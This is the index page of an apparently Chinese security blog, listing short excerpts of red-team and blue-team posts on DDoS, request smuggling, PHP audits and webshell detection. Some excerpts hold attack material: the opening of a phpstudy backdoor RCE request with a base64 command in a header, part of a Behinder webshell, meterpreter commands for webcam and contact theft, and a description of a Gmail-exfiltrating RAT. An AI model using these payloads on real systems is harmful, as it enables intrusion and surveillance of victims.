openvpn udp 反射放大DDoS攻击实验

发表于 2019-10-14 更新于 2019-10-15
本文字数： 2.3k 阅读时长 ≈ 2 分钟

姿势,什么姿势?

阅读全文 »

MSF偏执模式

发表于 2019-10-09 更新于 2019-12-30 分类于红队
本文字数： 1.8k 阅读时长 ≈ 2 分钟

MSF偏执模式在某些环境下，我们需要用到meterpreter的偏执模式(paranoid mode)。偏执模式在面对接受的请求很多的时候，可以有效过滤筛选回连的请求，只留下自己所需要的。同时，因为其使用了SSL/TLS 认证，因此在应对流量监控和分析时，有很不错的效果，当然也能够Bypass ...

阅读全文 »

某src挖掘

发表于 2019-10-01 更新于 2019-12-03
本文字数： 2.8k 阅读时长 ≈ 3 分钟

姿势,什么姿势?

阅读全文 »

phpstudy rce

发表于 2019-09-24 更新于 2019-09-25
本文字数： 250 阅读时长 ≈ 1 分钟

payload GET / HTTP/1.1Host: **.**.**Accept-Charset: ZWNobyBzeXN0ZW0oImlwY29uZmlnIik7Accept: */*Accept-Language: enAccept-Encoding: gzip,deflateUser-Ag ...

阅读全文 »

冰蝎通信研究

发表于 2019-09-23 更新于 2019-12-22 分类于蓝队
本文字数： 4.8k 阅读时长 ≈ 4 分钟

shell分析phpshell.php <?php@error_reporting(0);session_start();if (isset($_GET['pass'])){ $key=substr(md5(uniqid(rand())),16); $_SESSION[' ...

阅读全文 »

ios to Android

发表于 2019-09-15 更新于 2019-09-18
本文字数： 1.8k 阅读时长 ≈ 2 分钟

最近从ios换到了安卓，终于把我的小屏iphone se给抛弃了。换成了全面屏Android Q是真的香。记录一下刷机的一个下午。后面等ios13出了再把我的se刷上去解锁小米刷机需要在手机绑定账号后等待七天才可以进行解锁结果过程中会清除所有用户数据解锁工具去小米官方下载：https://ww ...

阅读全文 »

PHP-Audit-Labs-Day13-特定场合下addslashes函数的绕过

发表于 2019-09-14
本文字数： 7.3k 阅读时长 ≈ 7 分钟

PHP-Audit-Labs项目地址：https://www.ripstech.com/php-security-calendar-2017/ Turkey Baster class LoginManager { private $em; private $user; private ...

阅读全文 »

webshell流量监测

发表于 2019-09-11 更新于 2019-12-22 分类于蓝队
本文字数： 30k 阅读时长 ≈ 27 分钟

webshell流量监测一句话webshell检测POST 请求 POST /shop/d.php HTTP/1.1X-Forwarded-For: 165.40.13.244Referer: http://10.0.83.217:8080/Content-Type: application/x-w ...

阅读全文 »

burp自动化漏洞挖掘

发表于 2019-09-09
本文字数： 3.1k 阅读时长 ≈ 3 分钟

姿势,什么姿势?

阅读全文 »

流量走私(request-smuggling)

发表于 2019-09-09 更新于 2019-09-29
本文字数： 3.4k 阅读时长 ≈ 3 分钟

如何执行HTTP请求夹带攻击请求夹带攻击涉及将Content-Length头和Transfer-Encoding头放入单个HTTP请求并对其进行操作，以便前端和后端服务器以不同方式处理请求。完成此操作的确切方式取决于两台服务器的行为： CL.TE：前端服务器使用Content-Length头，后端 ...

阅读全文 »

PHP-Audit-Labs-Day12-误用htmlentities函数引发的漏洞

发表于 2019-09-08
本文字数： 5.8k 阅读时长 ≈ 5 分钟

PHP-Audit-Labs<?php$sanitized = [];foreach ($_GET as $key => $value) { $sanitized[$key] = intval($value);//要转换成 integer 的数量值,类型转换}$qu ...

阅读全文 »

Cookie Based XSS to Reflected XSS

发表于 2019-09-06
本文字数： 2.5k 阅读时长 ≈ 2 分钟

Finding Cookie Based XSS网站注销处抓包 https://example.com/login?redirect=/hello 修改数据包 REQUEST: https://example.com/login?redirect=asd';javascript:aler ...

阅读全文 »

Data Exfiltration

发表于 2019-09-04 更新于 2019-12-22 分类于红队
本文字数： 4.3k 阅读时长 ≈ 4 分钟

Powershell-RAT基于Python的后门程序，它使用Gmail将数据作为电子邮件附件进行泄露。此RAT将帮助红队合作期间的任何人将任何Windows计算机后门。它使用屏幕捕获跟踪用户活动，并将信息作为电子邮件附件发送给攻击者。 python3 PowershellRAT.py 查看源码 ...

阅读全文 »

子域名接管

发表于 2019-09-02 更新于 2019-09-06
本文字数： 5k 阅读时长 ≈ 5 分钟

dig命令dig 命令默认的输出信息比较丰富，大概可以分为 5 个部分。第一部分显示 dig 命令的版本和输入的参数。 ; <<>> DiG 9.11.3-1ubuntu1.7-Ubuntu <<>> @8.8.8.8 https://mdap.yuq ...

阅读全文 »

PHP-Audit-Labs-Day11-unserialize反序列化漏洞

发表于 2019-09-01 更新于 2019-12-25
本文字数： 12k 阅读时长 ≈ 11 分钟

PHP-Audit-Labs项目地址：https://www.ripstech.com/php-security-calendar-2017/ <?phpclass Template { public $cacheFile = '/tmp/cachefile'; public $ ...

阅读全文 »

Metasploit总结--持续更新

发表于 2019-08-30 更新于 2019-09-06
本文字数： 14k 阅读时长 ≈ 12 分钟

常用命令search 搜索 search -f *.jpgdownloadwebcam_stream -i 1/2 打开前置或后置摄像头check_root 检测rootdump_calllog 下载电话记录dump_contacts 下载信息记录geolocate 定位，需要下载谷歌地图基本命令： ...

阅读全文 »

openssl加密shell

发表于 2019-08-29 更新于 2019-12-22 分类于红队
本文字数： 1.3k 阅读时长 ≈ 1 分钟

姿势,什么姿势?

阅读全文 »

PHP-Audit-Labs-Day10-程序未恰当exit导致的问题

发表于 2019-08-28 更新于 2019-09-06
本文字数： 4.6k 阅读时长 ≈ 4 分钟

PHP-Audit-Labs项目地址：https://www.ripstech.com/php-security-calendar-2017/ extract($_POST);//重点function goAway() { error_log("Hacking attempt."); ...

阅读全文 »

ATT&CK

发表于 2019-08-26 更新于 2019-12-22 分类于 ATT&CK
本文字数： 12k 阅读时长 ≈ 11 分钟

姿势,什么姿势?

阅读全文 »

Atlassian Jira安全问题

发表于 2019-08-26 更新于 2019-09-25
本文字数： 3.5k 阅读时长 ≈ 3 分钟

Atlassian主要有5款产品，分别面向不同的市场。 JIRA（项目、任务管理软件，2002年上线）、Confluence（企业知识管理与协同软件，2004年上线）、BitBucket（代码库，2010年上线）、HipChat（内部聊天/协作软件，2012年上线）以及JIRA Service D ...

阅读全文 »

Wh0ale

No master and rookie，only hardworking and lazy.

GitHub Medium Mail Twitter

0%